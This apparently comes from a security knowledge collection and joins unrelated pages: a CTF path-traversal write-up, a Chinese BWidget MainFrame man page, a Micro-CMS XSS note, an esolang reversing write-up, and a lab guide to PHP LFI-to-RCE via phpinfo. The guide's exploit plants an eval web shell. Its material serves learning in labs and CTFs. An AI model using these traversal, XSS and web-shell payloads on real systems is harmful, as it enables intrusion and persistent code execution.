1) Service access 2) Read EULA/patch notes 3) Quit ``` We found /etc/password at the following relative path: `../../../etc/passwd`. We also can guess that our user's home directory is `/home/user`, based on the last entry of the file. From there, we can find the flag with a bit of guessing: ``` root@kali:/media/sf_CTFs/google/adminui# nc mngmnt-iface.ctfcompetition.com 1337 === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? ../../../home/user/flag CTF{I_luv_buggy_sOFtware}=== Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit ```
sec-knowleage
.TH MainFrame 3tk "tcllib - BWidget" .SH NAME .B MainFrame - 管理带有菜单、工具条和状态条的顶层窗口 .SH 创建 CREATION .B MainFrame pathName ?option value...? .SH 描述 DESCRIPTION MainFrame 管理的顶层窗口有: * 建立带有自动快捷键绑定和动态帮助关联的简单菜单, * 用户可以隐藏的一个或多个工具条, * 显示用户消息或菜单描述的一个状态条,和可选的一个进度条。 .SH 组件特有选项 WIDGET-SPECIFIC OPTIONS .TP -height 以 Tk_GetPixels 可接受的任何形式为用户框架指定想要的高度。如果这个选项小于等于零(缺省)则对这个窗口根本不要求任何大小。 .TP -menu (read-only) 这个选项描述菜单。它是一个列表,每五个元素描述一个级联菜单。它有下列格式: {菜单名 标签(tag)列表 菜单Id 撕开项 菜单项...} 这里的菜单项是一个列表,其中每个元素描述一个菜单项,它们可以是: 一个分隔符: {separator} 一个命令: {command 菜单名 ?标签列表? ?描述? ?快捷键? ?选项值? ...} 复选按钮: {checkbutton 菜单名 ?标签列表? ?描述? ?快捷键? ?选项值? ...} 单选按钮: {radiobutton 菜单名 ?标签列表? ?描述? ?快捷键? ?选项值? ...} 一个级联菜单: {cascad 菜单名 ?标签列表? 菜单Id 撕开项 菜单项} 这里的: 如果菜单名包含一个 &, 则把随后的字符自动的转换成 menu add 命令的相应的选项。 标签列表是这个条目的所有标签的列表,用于使用 MainFrame::setmenustate 来启用或停用菜单条目。 菜单Id 是给这个菜单的 id,你可以用 MainFrame::getmenu 来从它得到菜单路径名。 撕开项指定菜单是否有撕开条目。 描述为动态帮助指定字符串。 快捷键指定一个击键序列。它是两个元素的一个列表,其中的第一个元素是 Ctrl、Alt 或 CtrlAlt 之一,而第二个元素是一个字母或数字。建造一个快捷键字符串并在顶层窗口上设置相应的绑定来调用菜单项。 选项值为这个条目指定补充选项(参见 menu add 命令)。 被 ? 包围的每个值都是可选的并且缺省为空串,但是如果下列选项是非空则必须提供值。 .TP -separator (只读) 指定是否把分隔线画在用户窗口的顶部和/或底部。必须是值 none、top、bottom 或 both 之一。 它依赖于用户窗口的子组件的面型(relief)。 .TP -textvariable 为状态条的标签指定 textvariable 选项。在这个 MainFrame 的建立的时候把菜单条目的动态帮助描述映射到这个变量。如果用 MainFrame::configure 变更了这个变量,菜单描述将不可获得。你可以通过修改这个变量的值来变更这个标签的文字。 .TP -width 以 Tk_GetPixels 可接受的任何形式为用户框架指定想要的宽度。如果这个选项小于等于零(缺省)则对这个窗口根本不要求任何大小。 .SH 范例 .nf set descmenu { "&File" {} {} 0 { {command "&New" {} "建立一个新文档" {Ctrl n} -command Menu::new} {command "&Open..." {} "打开一个现存文件" {Ctrl o} -command Menu::open} {command "&Save" open "保存这个文档" {Ctrl s} -command Menu::save} {cascad "&Export" {} export 0 { {command "Format &1" open "导出文档为格式 1" {} -command {Menu::export 1}} {command "Format &2" open "导出文档为 2" {} -command {Menu::export 2}} }} {separator} {cascad "&Recent files" {} recent 0 {}} {separator} {command "E&xit" {} "退出应用程序" {} -command Menu::exit} } "&Options" {} {} 0 { {checkbutton "Toolbar" {} "显示/隐藏工具栏" {} -variable Menu::_drawtoolbar -command {$Menu::_mainframe showtoolbar toolbar $Menu::_drawtoolbar} } } } .fi .SH 组件命令 .TP pathName addindicator ?arg...? 在状态条的右端增加一个指示器(indicator)框。从左到右增加每个指示器。指示器是用 ?arg...? 给出的选项-值配置的一个 Tk 标签(label)组件。-relief 和 -borderwidth 选项分别缺省为 sunken(凹陷) 和 1。返回建立的标签的路径名。 .TP pathName addtoolbar 向 MainFrame 添加一个工具条。返回在其中放置工具条的那个新窗口的路径名。 .TP pathName cget option 返回用 option 给出的配置选项的当前值。Option 可以是能被建立命令接受的任何值。 .TP pathName configure ?option? ?value option value ...? 查询或修改这个组件的配置选项。如果未指定 option ,则返回描述 pathName 的所有可获得的选项的一个列表。如果指定了不带 value 的 option,则这个命令返回描述这个指名的 option 的一个列表(这个列表与未指定 option 所返回的值的相应的子集是一样的)。如果指定了一个或多个选项-值 对,则这个命令把给定的组件选项修改为给定的值;在这种情况下这个命令返回一个空串。Option 可以是能被建立命令接受的任何值。只读选项不可修改。 .TP pathName getframe 返回用户窗口的路径名。 .TP pathName getindicator index 返回第 index 次增加的指示器。 .TP pathName getmenu menuid 返回 id 是 menuid 的菜单的路径名。 .TP pathName gettoolbar index 返回第 index 次增加的工具条的路径名。 .TP pathName setmenustate tag state 把有标签 tag 的所有菜单项的 -state 选项的值设置成 state。 .TP pathName showstatusbar name name 是 none、status 或 progression 之一。使用 none 来隐藏状态条,用 status 来只显示标签(label),或用 progression 来显示标签和进度条。 .TP pathName showtoolbar index bool 如果 bool 是 0 则隐藏第 index 次增加的工具条,如果 bool 是 1 则显示第 index 次增加的工具条。要防止你的顶层窗口在隐藏/显示工具条期间调整大小,在操纵(manage)它的时候做 [wm geometry $top [wm geometry $top]] 。 .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/05/06 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
# Micro-CMS v1 - FLAG3 ## 0x00 Index ![](../flag0/imgs/index.jpg) ## 0x01 Page 2 ![](../flag0/imgs/2.jpg) ## 0x02 Edit Page 2 ```html <button onclick=alert(1)>Some button</button> ``` ![](./imgs/edit.jpg) Save and nothing happened. ## 0x03 FLAG But the button may trigger an js event. Go check the html and get the FLAG. ![](./imgs/flag.jpg)
sec-knowleage
## Eso Tape (RE, 80p) Description: I once took a nap on my keyboard. I dreamed of a brand new language, but I could not decipher it nor get its meaning. Can you help me? Hint: Replace the spaces with either '{' or '}' in the solution. Hint: Interpreters don't help. Operations write to the current index. ###ENG [PL](#pl-version) This was a fun task. We were given a source code of an unknown programming language. We assumed it would print out the flag. First observation we made, was that number of `@*`, `@**` and `@***` instructions was about right for the flag, and ther distribution among code was about uniform - so we assumed those were print statements. This is start of code: ``` ## %% %++ %++ %++ %# *&* @** %# **&* ***-* ***-* %++ %++ @*** ``` This code should print out `IW`. After trying many things, we noticed that I is 9th letter of alphabet, which is `3*3` - and 3 is the number of `@++` instructions, so `*&*` was likely multiplication. We also guessed that `*`, `**` and `***` refer to distinct "registers" of machine. Since the first print statement prints from the second register, something had to be put there - after some trial and error, we concluded that `%#` is something like "move current write pointer to the next register". We wrote interpreter up to this part, at which point we got stuck. After some time, admin hinted on IRC, that this is a real language. Looking it up on esolang website, we found out it is `TapeBagel`. After finishing up the interpreter, we got flag. ###PL version To byłe ciekawe zadanie - dostaliśmy plik z kodem w nizenanym języku programowania. Naturalnie założyliśmy, że wypisuje on flagę. Patrząc na liczbę instrukcji z `@`, domyśliliśmy się, że są to instrukcje wypisania. Początek kodu: ``` ## %% %++ %++ %++ %# *&* @** %# **&* ***-* ***-* %++ %++ @*** ``` Ten kod powinien zatem wypisywać `IW`. Po dłuższej chwili zauważyliśmy, że I jest dziewiątą literą alfabetu, a `9=3*3`, przy czym 3 to ilość instrukcji `%++`, które zapewne zwiększają jakąś liczbę. Zatem `*&*` zapewne mnoży liczbę `*` przez samą siebie. Później wpadliśmy na to, że `*`, `**`, `***` to zapewne kolejne rejestry maszyny. Ponieważ `@**` wypisuje dopiero drugi rejestr, coś musiało być do niego wcześniej włożone. W ten sposób wymyślilismy, że `%#` to "zwiększanie wskaźnika". Napisaliśmy interpreter uwzględniający znane już nam instrukcje, nie mogliśmy wypisać nic więcej niż `IW ILOV`. Po jakimś czasie admin napisał na IRCu, że to prawdziwy język. Poszukalismy więc na stronie esolang tegoż, i znaleźliśmy - jest to `TapeBagel`. Dokończywszy interpreter, dostaliśmy flagę.
sec-knowleage
# PHP Local File Inclusion RCE with PHPINFO [中文版本(Chinese version)](README.zh-cn.md) In PHP file inclusion vulnerabilities, when we cannot find a valid file to include for triggering RCE, we might be able to include a temporary file to exploit it if there exists PHPINFO which can tell us the randomly generated filename of the temporary file and its location. Reference: - https://dl.packetstormsecurity.net/papers/general/LFI_With_PHPInfo_Assitance.pdf ## Vulnerable Environment To start the vulnerable environment: ``` docker compose up -d ``` The target environment is the latest PHP 7.2, which tell us this vulnerability exists regardless of the version. After the environment is started, access `http://your-ip:8080/phpinfo.php` to get a PHPINFO page and `http://your-ip:8080/lfi.php?file=/etc/passwd` shows there is an LFI vulnerability. ## Exploit Details When sending a POST request to PHP and the request contains a FILE block, PHP will save the file posted into a temporary file (usually `/tmp/php[6 random digits]`), the filename can be found at `$_FILES` variable. This temp file will be deleted after the request is over. In the meantime, PHPINFO page prints all the variables in the context, including `$_FILES`. So, the temp file's name can be found in the response if we send the POST request to the PHPINFO page. In this way, an LFI vulnerability can be promoted into an RCE without an existed useable local file. File inclusion and PHPINFO are usually in different web pages. In theory, we need to send the filename to the file inclusion page after retrieving the it in the response of the file uploading request to the PHPINFO page. However, after the first request finishes, the file would be removed from the disk, so we need to win the race. Steps: 1. Send the file upload request to PHPINFO page with the HEADER and GET fields filled with large chunks of junk data. 2. The response content would be huge because PHPINFO will print out all the data. 3. PHP's default output buffer size is 4096 bytes. It can be understood as PHP return 4096 bytes each time during a socket connection. 4. So we use raw socket to achieve our goal. Each time we read 4096 bytes and send the filename to the LFI page once we get it. 5. By the time we got the filename, the first socket connection has not ended, which means the temp file still exists at that time. 6. By taking advantage of the time gap, the temp file can be included and executed. ## Exploit The python script [exp.py](exp.py) implements the above process. After successfully include the temp file, `<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>` will be executed to generate a permanent file `/tmp/g` for further use. use python2:`python exp.py your-ip 8080 100`: ![](1.png) The script success at the 189th packet, after that arbitrary code can be executed: ![](2.png)
sec-knowleage